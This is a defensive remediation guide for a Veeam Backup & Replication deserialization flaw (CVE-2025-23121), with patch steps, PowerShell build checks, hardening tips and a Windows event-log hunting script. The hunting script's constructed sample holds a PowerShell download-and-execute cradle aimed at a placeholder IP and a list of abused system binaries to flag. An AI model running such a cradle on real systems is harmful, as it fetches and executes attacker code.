A remote code execution (RCE) vulnerability, CVE-2025-23121 (CVSS 9.9), affects Veeam Backup & Replication. Any authenticated domain user can execute arbitrary code on a domain-joined backup server through a BinaryFormatter deserialization flaw; builds up to and including 12.3.1.1139 are affected.
The Fix
Update Veeam Backup & Replication to version 12.3.2 (build 12.3.2.3617). This patch fixes the insecure deserialization.
Method 1: Apply the Official Patch via GUI
1. Log into the Veeam Backup & Replication console with a local Administrator account.
2. Navigate to Help > Check for Updates.
3. Download and run the updater for version 12.3.2.3617.
4. Follow the installer prompts, allowing it to stop and restart VBR services.
5. Proceed to the Verify section below.
If the in-console updater fails: Download the full installation ISO for version 12.3.2 from the Veeam website. Mount the ISO and run the installer to perform an in-place upgrade.
Method 2: Scripted Update and Verification
When managing several servers, check the installed build with PowerShell. The update package itself must still be downloaded from Veeam.
# Check current VBR build version
$VeeamRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication"
$CurrentBuild = (Get-ItemProperty -Path $VeeamRegPath).Build
Write-Host "Current Veeam Build: $CurrentBuild"
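Generalizing the single-server check above to several servers, as an added example that is not part of the original page or of Veeam's own tooling: it reads the same registry value, compares the full four-part build with [version] so that builds whose last segment happens to exceed 1139 (for example 12.1.0.2131) are still classified as vulnerable, and collects results over WinRM with Invoke-Command. The host names vbr01 and vbr02 are placeholders, and the build strings at the top are constructed to exercise the comparison without touching any server.

```powershell
# Added example (not from the page): fleet-wide build check for CVE-2025-23121.
# Assumes WinRM access to each server and the registry value used in the single-server check above.
$FixedBuild = [version]'12.3.2.3617'   # first build containing the fix, per Veeam's advisory

function Test-VbrBuildVulnerable {
    # True when the build predates the fix. Compares all four components:
    # 12.1.0.2131 is vulnerable even though its last segment is greater than 1139.
    param([Parameter(Mandatory)][string]$Build)
    $parsed = $null
    if (-not [version]::TryParse($Build, [ref]$parsed)) {
        throw "Unrecognised build string '$Build'"
    }
    return $parsed -lt $FixedBuild
}

# Constructed build strings exercising the comparison without touching a server
foreach ($b in '12.3.1.1139', '12.1.0.2131', '12.3.2.3617') {
    '{0,-12} vulnerable: {1}' -f $b, (Test-VbrBuildVulnerable -Build $b)
}

$Servers = 'vbr01', 'vbr02'   # placeholder host names

$Results = Invoke-Command -ComputerName $Servers -ErrorAction Continue -ScriptBlock {
    $key   = 'HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication'
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    $build = if ($props) { [string]$props.Build } else { $null }
    [pscustomobject]@{ Build = $build }
}

foreach ($r in $Results) {
    $name = $r.PSComputerName
    if (-not $r.Build) {
        Write-Warning "${name}: VBR registry key not found (not installed, or the key path differs)"
        continue
    }
    if (Test-VbrBuildVulnerable -Build $r.Build) {
        Write-Warning "${name}: build $($r.Build) is vulnerable to CVE-2025-23121; update to $FixedBuild"
    } else {
        Write-Host "${name}: build $($r.Build) is patched"
    }
}
```

Servers that are unreachable over WinRM are reported by Invoke-Command as errors and simply do not appear in the results, so reconcile the output against your inventory rather than treating silence as "patched".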
Any build of 12.3.1.1139 or earlier is vulnerable. Compare the full four-part build number rather than the last segment: the last segment is not monotonic across 12.x releases (12.1.0.2131 is vulnerable although 2131 is greater than 1139), and casting a string such as "12.3.1.1139" to [int] fails.
if ([version]$CurrentBuild -lt [version]"12.3.2.3617") {
    Write-Warning "Server is vulnerable to CVE-2025-23121. Update to build 12.3.2.3617 required."
}
To perform a silent installation after obtaining the official 12.3.2.3617 update package:
# Example silent install command. Adjust the path to your downloaded update executable and confirm the unattended-install switches against the release notes shipped with the package.
$Installer = Start-Process -FilePath "X:\VeeamBackup&Replication_12.3.2.3617.exe" -ArgumentList "/silent /norestart" -Wait -PassThru
if ($Installer.ExitCode -ne 0) {
    throw "Update installer exited with code $($Installer.ExitCode); check the installer log before continuing."
}
# Restart core VBR services after the update
Restart-Service "VeeamBackupSvc" -Force
Restart-Service "VeeamTransportSvc" -Force
Additional Hardening (Post-Patch):
Apply these security practices after patching:
- Isolate Backup Servers: Do not domain-join backup servers. Use local accounts for administration.
- Restrict Access: Minimize the number of domain users with access to the VBR server and console. Control membership in the Backup Operators role.
- Network Segmentation: Place the Veeam backup server within a secured network segment, not publicly exposed.
Verify
Confirm the patch is applied and check for indicators of compromise.
1. Verify the Patch: In the Veeam console, go to Help > About; the build must read 12.3.2.3617. Alternatively, re-run the PowerShell check: Get-ItemProperty "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication" | Select-Object Build.
2. Check for Related Vulnerabilities: Also address CVE-2025-24286, which is patched in the same 12.3.2 update.
3. Monitor for Exploitation: Exploitation does not produce a distinctive error. Enable process-creation auditing and watch the Windows Security log for unexpected child processes of the Veeam Backup Service (Veeam.Backup.Service.exe, service name VeeamBackupSvc): event 4688 with that parent, especially PowerShell or other script hosts, and unexpected outbound network connections from that process. Because the payload runs inside the service, those children carry the service's identity, so correlate them with the domain account logons (4624) that preceded the activity.
Common Mistake: Do not treat the authentication requirement as a mitigation. Any domain account, including a low-privileged user account that has been phished or otherwise compromised, satisfies it, and network isolation alone does not stop an authenticated attacker who can reach the server. The patch is the only effective fix.
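A hunting script for the 4688 pattern described in step 3, as an added example that is not from the original page. It assumes process-creation auditing is enabled on the backup server (and command-line auditing if you want the CommandLine field populated), that the service binary is Veeam.Backup.Service.exe, and that the list of script hosts and living-off-the-land binaries it flags is a starting point to tune locally. The sample records are constructed, not real telemetry, so the logic can be run offline before pointing it at the Security log.

```powershell
# Added example (not from the page): flag processes spawned by the Veeam Backup Service.
# Assumes 4688 process-creation auditing is on; the binary name and flag list are assumptions to tune.

$VeeamServiceExe = 'Veeam.Backup.Service.exe'
# Script hosts and LOLBins the backup service should have no reason to launch
$FlaggedChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                     'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'bitsadmin.exe')

function ConvertFrom-ProcessCreationEvent {
    # Flattens a 4688 EventRecord into the fields the hunt needs
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    [pscustomobject]@{
        TimeCreated = $Event.TimeCreated
        User        = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
        Parent      = $data['ParentProcessName']   # "Creator Process Name"; present on Windows 10 / Server 2016 and later
        Process     = $data['NewProcessName']
        CommandLine = $data['CommandLine']         # empty unless command-line auditing is enabled
    }
}

function Find-VeeamServiceChildren {
    # Returns one record per process whose parent is the Veeam Backup Service, with a verdict
    param([Parameter(Mandatory)][object[]]$Records)
    foreach ($r in $Records) {
        if (-not $r.Parent) { continue }
        if ([IO.Path]::GetFileName($r.Parent) -ne $VeeamServiceExe) { continue }
        $child   = [IO.Path]::GetFileName($r.Process)
        $verdict = if ($FlaggedChildren -contains $child) { 'SUSPICIOUS' } else { 'review' }
        [pscustomobject]@{
            TimeCreated = $r.TimeCreated
            User        = $r.User
            Child       = $child
            CommandLine = $r.CommandLine
            Verdict     = $verdict
        }
    }
}

# Constructed sample records (not real telemetry). Children of the service run under the
# service's identity, which is why the user column does not show the attacker's domain account.
$VeeamDir = 'C:\Program Files\Veeam\Backup and Replication\Backup'
$Sample = @(
    [pscustomobject]@{ TimeCreated = '2025-06-18 10:02:11'; User = 'NT AUTHORITY\SYSTEM'
                       Parent = "$VeeamDir\Veeam.Backup.Service.exe"
                       Process = "$VeeamDir\Veeam.Backup.Manager.exe"; CommandLine = '' }
    [pscustomobject]@{ TimeCreated = '2025-06-18 10:05:40'; User = 'NT AUTHORITY\SYSTEM'
                       Parent = "$VeeamDir\Veeam.Backup.Service.exe"
                       Process = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://198.51.100.7/a'')"' }
    [pscustomobject]@{ TimeCreated = '2025-06-18 10:06:02'; User = 'CORP\jsmith'
                       Parent = 'C:\Windows\explorer.exe'
                       Process = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd' }
)
Find-VeeamServiceChildren -Records $Sample | Format-Table -AutoSize

# Against the live Security log (needs 4688 auditing and local admin rights):
# $Live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-7) } |
#         ForEach-Object { ConvertFrom-ProcessCreationEvent -Event $_ }
# Find-VeeamServiceChildren -Records $Live | Where-Object Verdict -eq 'SUSPICIOUS'
```

On the constructed sample only the powershell.exe launch is marked SUSPICIOUS; the Veeam.Backup.Manager.exe launch comes back as "review" because it is a child the service spawns itself, and the cmd.exe from explorer.exe is ignored because its parent is not the service. Build the allow-list of expected children from a known-clean server before you rely on the "review" verdicts.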

